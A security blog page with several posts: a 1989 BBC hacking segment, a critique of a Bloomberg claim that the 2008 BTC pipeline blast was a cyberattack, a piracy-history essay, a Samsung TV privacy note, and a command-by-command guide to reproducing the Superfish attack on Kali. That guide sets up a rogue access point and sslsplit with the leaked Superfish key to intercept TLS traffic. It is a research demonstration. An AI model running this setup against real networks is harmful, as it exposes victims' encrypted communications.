Skip to content


Antenna: Computer Viruses and Hacking (BBC 1989)

Interesting BBC program warning about a “new generation of hackers” in 1989. It’s full of soundbites about computer risk:

  • I thought it would never happen to me…
  • It’s a shock when it happens to you…
  • Everywhere I’ve worked so far it’s been there…
  • I felt as if I’d been burgled…
  • I’ve become far more cautious…
  • I think everyone needs to be careful…

Posted in History, Security.


SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.


A: Preparation of kali

  1. Download kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
    SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
    
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD to RP2, connect network and power-up
  6. SSH to kali using default user:password (root:toor)

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update).

  1. root@kali:~$ passwd
  2. root@kali:~$ adduser davi
  3. root@kali:~$ visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state –state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c “iptables-save > /etc/iptables.ipv4.nat”
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

  1. davi@kali:~$ wget https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ mkdir /var/log/sslsplit
  8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

Obviously Robert did all the hard work figuring this out. I’ve just tested the basics to see what it would take to setup a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Rosewill RNX-N180UBE wireless USB with external antenna, able to do “infrastructure mode”. Cost $21

Total cost: (re-purposed from other projects) $35 + $18 + 21 = $74
Total time: 20 minutes


Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Resize the partition

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Posted in Security.


Cyberwar revisionism: 2008 BTC pipeline explosion

Over on a site called “Genius” I’ve made a few replies to some other peoples’ comments on an old story: “Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar”

Genius offers the sort of experience where you have to believe a ton of pop-up scripts is a real improvement over plain text threads. Perhaps I don’t understand properly the value of markups and votes. So I’m re-posting my comments here in a more traditional text thread format, rather than using sticky-notes hovering over a story, not least of all because it’s easier for me to read and reference later.

Thinking about the intent of Genius, if there were an interactive interface I would rather see, the power of link-analysis and social data should be put into a 3D rotating text broken into paragraphs connected by lines from sources that you can spin through in 32-bit greyscale…just kidding.

But seriously if I have to click on every paragraph of text just to read it…something more innovative might be in order, more than highlights and replies. Let me know using the “non-genius boxes” (comment section) below if you have any thoughts on a platform you prefer.

Also I suppose I should introduce my bias before I begin this out-take of Genius (my text-based interpretation of their notation system masquerading as a panel discussion):

During the 2008 pipeline explosion I was developing critical infrastructure protection (CIP) tools to help organizations achieve reliability standards of the North American Electric Reliability Council (NERC). I think that makes me someone “familiar with events” although I’m never sure what journalists mean by that phrase. I studied the events extensively and even debriefed high-level people who spoke with media at the time. And I’ve been hands-on in pen-tests and security architecture reviews for energy companies.


Bloomberg: Countries have been laying the groundwork for cyberwar operations for years, and companies have been hit recently with digital broadsides bearing hallmarks of government sponsorship.

Thomas Rid: Let’s try to be precise here — and not lump together espionage (exfiltrating data); wiping attacks (damaging data); and physical attacks (damaging hardware, mostly ICS-run). There are very different dynamics at play.

Me: Agree. Would prefer not to treat every disaster as an act of war. In the world of IT the boundary between operational issues and security events (especially because software bugs are so frequent) tends to be very fuzzy. When security want to investigate and treat every event as a possible attack it tends to have the effect of 1) shutting down/slowing commerce instead of helping protect it 2) reducing popularity and trust in security teams. Imagine a city full of roadblocks and checkpoints for traffic instead of streetlights and a police force that responds to accidents. Putting in place the former will have disastrous effects on commerce.
People use terms like sophisticated and advanced to spin up worry about great unknowns in security and a looming cyberwar. Those terms should be justified and defined carefully; otherwise basic operational oversights and lack of quality in engineering will turn into roadblock city.

Bloomberg: Sony Corp.’s network was raided by hackers believed to be aligned with North Korea, and sources have said JPMorgan Chase & Co. blamed an August assault on Russian cyberspies.

Thomas Rid: In mid-February the NYT (Sanger) reported that the JPMorgan investigation has not yielded conclusive evidence.

Mat Brown: Not sure if this is the one but here’s a recent Bits Blog post on the breach http://mobile.nytimes.com/blogs/bits/2014/12/23/daily-report-simple-flaw-allowed-jp-morgan-computer-breach/

Me: “FBI officially ruled out the Russian government as a culprit” and “The Russian government has been ruled out as sponsor” http://www.reuters.com/article/2014/10/21/us-cybersecurity-jpmorgan-idUSKCN0IA01L20141021

Bloomberg: The Refahiye explosion occurred two years before Stuxnet, the computer worm that in 2010 crippled Iran’s nuclear-enrichment program, widely believed to have been deployed by Israel and the U.S.

Robert Lee: Sort of. The explosion of 2008 occurred two years before the world learned about Stuxnet. However, Stuxnet was known to have been in place years before 2010 and likely in development since around 2003-2005. Best estimates/public knowledge place Stuxnet at Natanz in 2006 or 2007.

Me: Robert is exactly right. Idaho National Labs held tests called “Aurora” (over-accelerating destroying a generator) on the morning of March 4, 2007. (https://muckrock.s3.amazonaws.com/foia_files/aurora.wmv)
By 2008 it became clear in congressional hearings that NERC had provided false information to a subcommittee in Congress on Aurora mitigation efforts by the electric sector. Tennessee Valley Authority (TVA) in particular was called vulnerable to exploit. Some called for a replacement of NERC. All before Stuxnet was “known”.

Bloomberg: National Security Agency experts had been warning the lines could be blown up from a distance, without the bother of conventional weapons. The attack was evidence other nations had the technology to wage a new kind of war, three current and former U.S. officials said.

Robert Lee: Again, three anonymous officials. Were these senior level officials that would have likely heard this kind of information in the form of PowerPoint briefings? Or were these analysts working this specific area? This report relies entirely on the evidence of “anonymous” officials and personnel. It does not seem like serious journalism.

Me: Agree. Would like to know who the experts were, given we also saw Russia dropping bombs five days later. The bombs after the fire kind of undermines the “without the bother” analysis.

Bloomberg: Stuxnet was discovered in 2010 and this was obviously deployed before that.

Robert Lee: I know and greatly like Chris Blask. But Jordan’s inclusion of his quote here in the story is odd. The timing aspect was brought up earlier and Chris did not have anything to do with this event. It appears to be an attempt to use Chris’ place in the community to add value to the anonymous sources. But Chris is just making an observation here about timing. And again, this was not deployed before Stuxnet — but Chris is right that it was done prior to the discovery of Stuxnet.

Me: Yes although I’ll disagree slightly. As Aurora tests by 2008 were in general news stories, and congress was debating TVA insecurity and NERC ability to honestly report risk, Stuxnet was framed to be more unique and notable that it should have been.

Bloomberg: U.S. intelligence agencies believe the Russian government was behind the Refahiye explosion, according to two of the people briefed on the investigation.

Robert Lee: It’s not accurate to say that “U.S. intelligence agencies” believe something and then source two anonymous individuals. Again, as someone that was in the U.S. Intelligence Community it consistently frustrates me to see people claiming that U.S. intelligence agencies believe things as if they were all tightly interwoven, sharing all intelligence, and believing the same things.

Additionally, these two individuals were “briefed on the investigation” meaning they had no first hand knowledge of it. Making them non-credible sources even if they weren’t anonymous.

Me: Also interesting to note the August 28, 2008 Corner House analysis of the explosion attributed it to Kurdish Rebels (PKK). Yet not even a mention here? http://www.eca-watch.org/problems/oil_gas_mining/btc/CornerHouse_re_ECGD_and%20BTC_26aug08.pdf

[NOTE: I’m definitely going to leverage Robert’s excellent nuance statements when talking about China. Too often the press will try to paint a unified political picture, despite social scientists working to parse and explain the many different perspectives inside an agency, let alone a government or a whole nation. Understanding facets means creating better controls and more rational policy.]

Bloomberg: Although as many as 60 hours of surveillance video were erased by the hackers

Robert Lee: This is likely the most interesting piece. It is entirely plausible that the cameras were connected to the Internet. This would have been a viable way for the ‘hackers’ to enter the network. Segmentation in industrial control systems (especially older pipelines) is not common — so Internet accessible cameras could have given the intruders all the access they needed.

Me: I’m highly suspect of this fact from experience in the field. Video often is accidentally erased or disabled. Unless there is a verified chain of malicious destruction steps, it almost always is more likely to find surveillance video systems fragile, designed wrong or poorly run.

Bloomberg: …a single infrared camera not connected to the same network captured images of two men with laptop computers walking near the pipeline days before the explosion, according to one of the people, who has reviewed the video. The men wore black military-style uniforms without insignias, similar to the garb worn by special forces troops.

Robert Lee: This is where the story really seems to fall apart. If the hackers had full access to the network and were able to connect up to the alarms, erase the videos, etc. then what was the purpose of the two individuals? For what appears to be a highly covert operation the two individuals add an unnecessary amount of potential error. To be able to disable alerting and manipulate the process in an industrial control system you have to first understand it. This is what makes attacks so hard — you need engineering expertise AND you must understand that specific facility as they are all largely unique. If you already had all the information to do what this story is claiming — you wouldn’t have needed the two individuals to do anything. What’s worse, is that two men walking up in black jumpsuits or related type outfits in the middle of the night sounds more like engineers checking the pipeline than it does special forces. This happened “days before the explosion” which may be interesting but is hardly evidence of anything.

Me: TOTALLY AGREE. I will just add that earlier we were being told “blown up from a distance, without the bother of conventional weapons” and now we’re being told two people on the ground walking next to the pipeline. Not much distance there.

Bloomberg: “Given Russia’s strategic interest, there will always be the question of whether the country had a hand in it,” said Emily Stromquist, an energy analyst for Eurasia Group, a political risk firm based in Washington.

Robert Lee: Absolutely true. “Cyber” events do not happen in a vacuum. There is almost always geopolitical or economical interests at play.

Me: I’m holding off from any conclusion it’s a cyber event. And strategic interest to just Russia? That pipeline ran across how many conflict/war zones? There was much controversy during planning. In 2003 analysts warned that the PKK were highly likely to attack it. http://www.baku.org.uk/publications/concerns.pdf

Bloomberg: Eleven companies — including majority-owner BP, a subsidiary of the State Oil Company of Azerbaijan, Chevron Corp. and Norway’s Statoil ASA — built the line, which has carried more than two billion barrels of crude since opening in 2006.

Robert Lee: I have no idea how this is related to the infrared cameras. There is a lot of fluff entered into this article.

Me: This actually supports the argument that the pipeline was complicated both in politics and infrastructure, increasing risks. A better report would run through why BP planning would be less likely to result in disaster in this pipeline compared to their other disasters, especially given the complicated geopolitical risks.

Bloomberg: According to investigators, every mile was monitored by sensors. Pressure, oil flow and other critical indicators were fed to a central control room via a wireless monitoring system. In an extra measure, they were also sent by satellite.

Robert Lee: This would be correct. There is a massive amount of sensor and alert data that goes to any control center — pipelines especially — as safety is of chief importance and interruptions of even a few seconds in data can have horrible consequences.

Me: I believe it is more accurate to say every mile was designed to be monitored by sensors. We see quite clearly from investigations of the San Bruno, California disaster (killing at least 8 people) that documentation and monitoring of lines are imperfect even in the middle of an expensive American suburban neighborhood. http://articles.latimes.com/2011/aug/30/local/la-me-0831-san-bruno-20110831

Bloomberg: The Turkish government’s claim of mechanical failure, on the other hand, was widely disputed in media reports.

Thomas Rid: A Wikileaks State Department cable refers to this event — by 20 August 2009, BP CEO Inglis was “absolutely confident” this was a terrorist attack caused by external physical force. I haven’t had the time to dig into this, but here’s the screenshot from the cable:
Thanks to @4Dgifts

Me: It may help to put it into context of regional conflict at that time. Turkey started Operation Sun (Güneş Harekatı) attacking the PKK, lasting into March or April. By May the PKK had claimed retaliation by blowing up a pipeline between Turkey and Iran, which shutdown gas exports for 5 days (http://www.dailystar.com.lb/News/Middle-East/2008/May-27/75106-explosion-cuts-iran-turkey-gas-pipeline.ashx). We should at least answer why BTC would not be a follow-up event.
And there have been several explosions since then as well, although I have not seen anyone map all the disasters over time. Figure an energy market analyst must have done one already somewhere.
And then there’s the Turkish news version of events: “Turkish official confirms BTC pipeline blast is a terrorist act” http://www.hurriyet.com.tr/english/finance/9660409.asp

Thomas Rid: Thanks — Very useful!

Bloomberg: “We have never experienced any kind of signal jamming attack or tampering on the communication lines, or computer systems,” Sagir said in an e-mail.

Robert Lee: This whole section seems to heavily dispute the assumption of this article. There isn’t really anything in the article presented to dispute this statement.

Me: Agree. The entire article goes to lengths to make a case using anonymous sources. Mr. Sagir is the best source so far and says there was no tampering detected. Going back to the surveillance cameras, perhaps they were accidentally erased or non-functioning due to error.

Bloomberg: The investigators — from Turkey, the U.K., Azerbaijan and other countries — went quietly about their business.

Robert Lee: This is extremely odd. There are not many companies who have serious experience with incident response in industrial control system scenarios. Largely because industrial control system digital forensics and incident response is so difficult. Traditional information technology networks have lots of sources of forensic data — operations technology (industrial control systems) generally do not.

The investigators coming from one team that works and has experience together adds value. The investigators coming from multiple countries sounds impressive but on the ground level actually introduces a lot of confusion and conflict as the teams have to learn to work together before they can even really get to work.

Me: Agree. The pipeline would see not only confusion in the aftermath, it also would find confusion in the setup and operation, increasing chance of error or disaster.

Bloomberg: As investigators followed the trail of the failed alarm system, they found the hackers’ point of entry was an unexpected one: the surveillance cameras themselves.

Robert Lee: How? This is a critical detail. As mentioned before, incident response in industrial control systems is extremely difficult. The Industrial Control System — Computer Emergency Response Team (ICS-CERT) has published documents in the past few years talking about the difficulty and basically asking the industry to help out. One chief problem is that control systems usually do not have any ability to perform logging. Even in the rare cases that they do — it is turned off because it uses too much storage. This is extremely common in pipelines. So “investigators” seem to have found something but it is nearly outside the realm of possible that it was out in the field. If they had any chance of finding anything it would have been on the Windows or Linux systems inside the control center itself. The problem here is that wouldn’t have been the data needed to prove a failed alarm system.

It is very likely the investigators found malware. That happens a lot. They likely figured the malware had to be linked to blast. This is a natural assumption but extremely flawed based on the nature of these systems and the likelihood of random malware to be inside of a network.

Me: Agree. Malware noticed after disaster becomes very suspicious. I’m most curious why anyone would setup surveillance cameras for “deep into the internal network” access. Typically cameras are a completely isolated/dedicated stack of equipment with just a browser interface or even dedicated monitors/screens. Strange architecture.

Bloomberg: The presence of the attackers at the site could mean the sabotage was a blended attack, using a combination of physical and digital techniques.

Robert Lee: A blended cyber-physical attack is something that scares a lot of people in the ICS community for good reason. It combines the best of two attack vectors. The problem in this story though is that apparently it was entirely unneeded. When a nation-state wants to spend resources and talents to do an operation — especially when they don’t want to get caught — they don’t say “let’s be fancy.” Operations are run in the “path of least resistance” kind of fashion. It keeps resource expenditures down and keeps the chance of being caught low. With everything discussed as the “central element of the attack” it was entirely unneeded to do a blended attack.

Me: What really chafes my analysis is that the story is trying to build a scary “entirely remote attack” scenario while simultaneously trying to explain why two people are walking around next to the pipeline.
Also agree attackers are like water looking for cracks. Path of least resistance.

Bloomberg: The super-high pressure may have been enough on its own to create the explosion, according to two of the people familiar with the incident.

Robert Lee: Another two anonymous sources.

Me: And “familiar with the incident” is a rather low bar.

Bloomberg: Having performed extensive reconnaissance on the computer network, the infiltrators tampered with the units used to send alerts about malfunctions and leaks back to the control room. The back-up satellite signals failed, which suggested to the investigators that the attackers used sophisticated jamming equipment, according to the people familiar with the probe.

Robert Lee: If the back-up satellite signal failed in addition to alerts not coming from the field (these units are polled every few seconds or minutes depending on the system) there would have been an immediate response from the personnel unless they were entirely incompetent or not present (in that case this story would be even less likely). But jamming satellite links is an even extra level of effort beyond hacking a network and understanding the process. If this was truly the work of Russian hackers they are not impressive for all the things they accomplished — they were embarrassingly bad at how many resources and methods they needed to accomplish this attack when they had multiple ways of accomplishing it with any one of the 3-4 attack vectors.

Me: Agree. The story reads to me like conventional attack, known to be used by PKK, causes fire. Then a series of problems in operations are blamed on super-sophisticated Russians. “All these systems not working are the fault of elite hackers”

Bloomberg: Investigators compared the time-stamp on the infrared image of the two people with laptops to data logs that showed the computer system had been probed by an outsider.

Robert Lee: “Probed by an outsider” reveals the system to be an Internet connected system. “Probes” is a common way to describe scans. Network scans against publicly accessible devices occur every second. There is a vast amount of research and public information on how often Internet scans take place (usually a system begins to be scanned within 3-4 seconds of being placed online). It would have been more difficult to find time-stamps in any image that did not correlate to probing.

Me: Also is there high trust in time-stamps? Accurate time is hard. Looking at the various scenarios (attackers had ability to tamper, operations did a poor job with systems) we should treat a time-stamp-based correlation as how reliable?

Bloomberg: Years later, BP claimed in documents filed in a legal dispute that it wasn’t able to meet shipping contracts after the blast due to “an act of terrorism.”

Robert Lee: Which makes sense due to the attribution the extremists claimed.

Me: I find this sentence mostly meaningless. My guess is BP was using legal or financial language because of the constraints in court. Would have to say terrorism, vandalism, etc. to speak appropriately given precedent. No lawyer wants to use a new term and establish new norms/harm when they can leverage existing work.

Bloomberg: A pipeline bombing may fit the profile of the PKK, which specializes in extortion, drug smuggling and assaults on foreign companies, said Didem Akyel Collinsworth, an Istanbul-based analyst for the International Crisis Group. But she said the PKK doesn’t have advanced hacking capabilities.

Robert Lee: This actually further disproves the article’s theory. If the PKK took credit, the company believed it to be them, the group does not possess hacking skills, and specialists believe this attack was entirely their style — then it was very likely not hacking related.

Me: Agree. Wish this pipeline explosion would be put in context of other similar regional explosions, threats from the PKK that they would attack pipelines and regional analyst warnings of PKK attacks.

Bloomberg: U.S. spy agencies probed the BTC blast independently, gathering information from foreign communications intercepts and other sources, according to one of the people familiar with the inquiry.

Robert Lee: I would hope so. There was a major explosion in a piece of critical infrastructure right before Russia invaded Georgia. If the intelligence agencies didn’t look into it they would be incompetent.

Me: Agree. Not only for defense, also for offense knowledge, right? Would be interesting if someone said they probed it differently than the other blasts, such as the one three months earlier between Turkey and Iran.

Bloomberg: American intelligence officials believe the PKK — which according to leaked State Department cables has received arms and intelligence from Russia — may have arranged in advance with the attackers to take credit, the person said.

Robert Lee: This is all according to one, yet again, anonymous source. It is extremely far fetched. If Russia was going to go through the trouble of doing a very advanced and covert cyber operation (back in 2008 when these types of operations were even less publicly known) it would be very out of character to inform an extremist group ahead of time.

Me: Agree, although also plausible to tell a group a pipeline would be blown up without divulging method. Then the group claims credit without knowing method. The disconnect I see is Russia trying to bomb the same pipeline five days later. Why go all conventional if you’ve owned the systems and can remotely do what you like?

Bloomberg: The U.S. was interested in more than just motive. The Pentagon at the time was assessing the cyber capabilities of potential rivals, as well as weaknesses in its own defenses. Since that attack, both Iran and China have hacked into U.S. pipeline companies and gas utilities, apparently to identify vulnerabilities that could be exploited later.

Robert Lee: The Pentagon is always worried about these types of things. President Clinton published PDD-63 in 1998 talking about these types of vulnerabilities and they have been assessing and researching at least since then. There is also no evidence provided about the Iranian and Chinese hacks claimed here. It’s not that these types of things don’t happen — they most certainly do — it’s that it’s not responsible or good practice to cite events because “we all know it’s happening” instead of actual evidence.

Me: Yes, explaining major disasters already happening and focus of congressional work (2008 TVA) would be a better perspective on this section. August 2003 was a sea change in bulk power risk assessment. Talking about Iran and China seems empty/idle speculation in comparison: http://www.nerc.com/pa/rrm/ea/Pages/Blackout-August-2003.aspx

Bloomberg: As tensions over the Ukraine crisis have mounted, Russian cyberspies have been detected planting malware in U.S. systems that deliver critical services like electricity and water, according to John Hultquist, senior manager for cyber espionage threat intelligence at Dallas-based iSight Partners, which first revealed the activity in October.

Robert Lee: It’s not that I doubt this statement, or John, but this is another bad trend in journalism. Using people that have a vested interest in these kind of stories for financial gain is a bad practice in the larger journalism community. iSight Partners offer cybersecurity services and specialize in threat intelligence. So to talk about ‘cyberspies’, ‘cyber espionage’, etc. is something they are financially motivated to hype up. I don’t doubt the credibility or validity of John’s statements but there’s a clear conflict of interest that shouldn’t be used in journalism especially when there are no named sources with first-hand knowledge on the event.

Me: Right! Great point Robert. Reads like free advertising for threat intelligence company X rather than trusted analysis. Would mind a lot less if a non-sales voice was presented with a dissenting view, or the journalist added in caution about the source being of a particular bias.
Also what’s the real value of this statement? As a crisis with Russia unfolds, we see Russia being more active/targeted. Ok, but what does this tell us about August 2008? No connection is made. Reader is left guessing.

Bloomberg: The keyboard was the better weapon.

Robert Lee: The entire article is focused on anonymous sources. In addition, the ‘central element of the attack’ was the computer intrusion which was analyzed by incident responders. Unfortunately, incident response in industrial control systems is at such a juvenile state that even if there were a lot of data, which there never is, it is hard to determine what it means. Attribution is difficult (look at the North Korea and Sony case where much more data was available including government level resources). This story just doesn’t line up.

When journalism reports on something it acknowledges would be history changing better information is needed. When those reports stand to increase hype and tension between nation-states in already politically tense times (Ukraine, Russia, Turkey, and the U.S.). Not including actual evidence is just irresponsible.

Me: Agree. It reads like a revision of history, so perhaps that’s why we’re meant to believe it’s “history changing.” I’m ready to see evidence of a hack yet after six years we have almost nothing to back up these claims. There is better detail about what happened from journalists writing at the time.
Also if we are to believe the conclusion that keyboards are the better weapon, why have two people walking along the pipeline and why bomb infrastructure afterwards? Would Russia send a letter after making a phone call? I mean if you look carefully at what Georgia DID NOT accuse Russia of it was hacking critical infrastructure.
Lack of detailed evidence, anonymous attribution, generic/theoretical vulnerability of infrastructure statements, no contextual explanations…there is little here to believe the risk was more than operational errors coupled with PKK targeted campaign against pipelines.

Posted in Energy, History, Security.


Eventually Navies Take Over

I attended a “keynote” talk at a security conference a few years ago with this title as a key premise. You know how I love history, so I was excited. The speaker, a well-regarded mathematician, told us “eventually, navies take over” because they will “perform tight surveillance of sea lanes and ensure safety for commerce”.

That sounded counter-factual to me, given what history tells us about rigid empires trying to oppress and control markets. So while I enjoyed the topic I noted some curious issues with this presentation perspective.

Common sense tells me authorities have historically struggled to stem a shift to nimbler, lighter and more open commerce lanes. Authoritarian models struggle for good reasons. Shipping routes protected by a Navy basically are a high tax that does not scale well, requiring controversial forms of “investment”.

This comes up all the time in security history circles. A “security tax” becomes an increasing liability because scaling perimeters is hard (the same way castles could not scale to protect trade on land); an expensive perimeter-based model as it grows actually helps accelerate demise of the empire that wants to stay in power. Perhaps we even could say navies trying to take over is the last straw for an enterprise gasping to survive as cloud services roll-in…

Consider that the infamous Spanish navy “flota” model — a highly guarded and very large shipment — seems an expensive disaster waiting to happen. It’s failure is not in an inability to deliver stuff from point A to B. The failure is in sustainability; an inability to stop competitive markets from forming with superior solutions (like the British version that came later trying to prevent American encroachment). The flota was an increased cost to maintain a route, which obsoleted itself.

Back to the keynote presentation it pointed out an attacker (e.g. the British) could make a large haul. This seems an odd point to make. Such a large haul was the effect of the flota, the perimeter model. There was a giant load of assets to be attacked, because it was an annual batch job. The British could take a large haul if they won, by design.

In defense of the flota model, the frequency of failure was low over many years. If we measured success simply on whether some shipments were profitable then it looks a lot better. This seems to me like saying Blockbuster was a success so eventually video rental stores (brick-and-mortar) take over. It sounds like going backwards in time not forward. The Spanish had a couple hundred years of shipments that kept the monarchy running, which may impress us just like the height of Blockbuster sales. To put it in infosec terms, should we say a perimeter model eventually will take over because it was used by company X to protect its commerce?

On the other hand the 80-years and the 30-years wars that Spain lost puts the flota timeline in different perspective. Oppressive extraction and taxes to maintain a navy that was increasingly overstretched and vulnerable, a period of expensive wars and leaks…in relative terms, this was not exactly a long stretch of smooth sailing.

More to the point, in peacetime the navy simply could not build a large enough presence to police all the leaks to pervasive draconian top-down trading rules. People naturally smuggled and expanded around navies or when they were not watching. We saw British and Dutch trade routes emerge out of these failures. And in wartime a growth in privateers increased difficulty for navies to manage routes against competition because the navy itself was targeted. Thus in a long continuum it seems we move towards openness until closed works out a competitive advantage. Then openness cracks the model and out-competes until…and so on. If we look at this keynote’s lesson from a Spanish threat to “take over” what comes to mind is failure; otherwise wouldn’t you be reading this in Spanish?

Hopefully this also puts into context why by 1856 America refused to ban “letters of marque” (despite European nations doing so in the Paris Declaration). US leadership expressly stated it would never want or need a permanent/standing navy (it believed privateers would be its approach to any dispute with a European military). The young American country did not envision having its own standing navy perhaps because it saw no need for the relic of unsustainable and undesirable closed markets. The political winds changed quite a bit for the US in 1899 after dramatic defeats of Spain but that’s another topic.

The conference presentation also unfortunately used some patently misleading statements like “pirates that refused to align with a government…[were] eventually executed”. I took that to mean the presenter was saying a failure to choose to serve a nation, a single one at that, would be a terminal risk for any mercenary or pirate. And I don’t believe that to be true at all.

We know some pirates, perhaps many, avoided being forced into alignment through their career and then simply retired on terms they decided. Peter Easton, a famous example, bought himself land with a Duke’s title in France. Duke Easton’s story has no signs of coercion or being forced to align. It sounds far more like a retirement agreement of his choosing. The story of “Wife of Cheng” is another example. Would you call her story the alignment of a pirate with a government, or a government aligning with the pirate? She clearly refused to align and was not executed.

Cheng I Sao repelled attack after attack by both the Chinese navy and the many Portuguese and British bounty hunters brought in to help capture her. Then, in 1810, the Chinese government tried a different tactic — they offered her universal pirate amnesty in exchange for peace.

Cheng I Sao jumped at the opportunity and headed for the negotiating table. There, the pirate queen arranged what was, all told, a killer deal. Fewer than 400 of her men received any punishment, and a mere 126 were executed. The remaining pirates got to keep their booty and were offered military jobs.

Describing pirates’ options as binary alignment-or-be-executed is crazy when you also put it in frame of carrying dual or more allegiances. One of the most famous cases in American history involves ships switching flags to the side winning at sea in order to get a piece of the spoils on their return to the appropriate port. The situation, in brief, unfolded (pun not intended) when two American ships came upon an American ship defeating a British one. The two approaching ships switched to British flags, chased off the American, then took the British ship captive switched flags back to American and split the reward from America under “letters of marque”. Eventually in court the wronged American ship proved the situation and credit was restored. How many cases went unknown?

The presenter after his talk backed away from defending facts that were behind the conclusions. He said he just read navy history lightly and was throwing out ideas for a keynote, so I let it drop as he asked. Shame, really, because I had been tossing out some thoughts on this topic for a while and it seems like a good foundation for debate. Another point I would love to discuss some day in terms of cybersecurity is why so many navy sailors converted to being pirates (hint: more sailors died transporting slaves than slaves died en route).

My own talks on piracy and letters of marque were in London, Oct 2012, San Francisco, Feb 2013 and also Mexico City, Mar 2013. They didn’t generate much response so I did not push the topic further. Perhaps I should bring them back again or submit updates, given how some have been talking about national concerns with cyber to protect commerce.

If I did present on this topic again, I might start with an official record of discussion with President Nixon, February 8, 1974, 2:37–3:35 p.m. It makes me wonder if the idea “eventually navies take over” actually is a form of political persuasion, a politicized campaign, rather than any sort of prediction or careful reflection on history:

Dr. Gray: I am an old Army man. But the issue is not whether we have a Navy as good as the Soviet Union’s, but whether we have a Navy which can protect commerce of the world. This is our #1 strategic problem.

Adm. Anderson: Suppose someone put pressure on Japan. We couldn’t protect our lines to Japan or the U.S.-Japan shipping lanes.

The questions I should have asked the keynote speaker were not about historic accuracy or even the role of navies. Instead perhaps I should have gone straight to “do you believe in authoritarianism (e.g. fascism) as a valid solution to market risks”?

Posted in History, Sailing, Security.


Samsung TV: Would You Trust It?

Samsung is in a bit of a pickle. They want people to know that “voice recognition feature is activated using the TV’s remote control”. But let’s face it their disclaimer/warning that comes with a TV gave away the real story:

You can control your SmartTV, and use many of its features, with voice commands.

If you enable Voice Recognition, you can interact with your Smart TV using your voice. To provide you the Voice Recognition feature, some voice commands may be transmitted (along with information about your device, including device identifiers) to a third-party service that converts speech to text or to the extent necessary to provide the Voice Recognition features to you. In addition, Samsung may collect and your device may capture voice commands and associated texts so that we can provide you with Voice Recognition features and evaluate and improve the features. Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition.

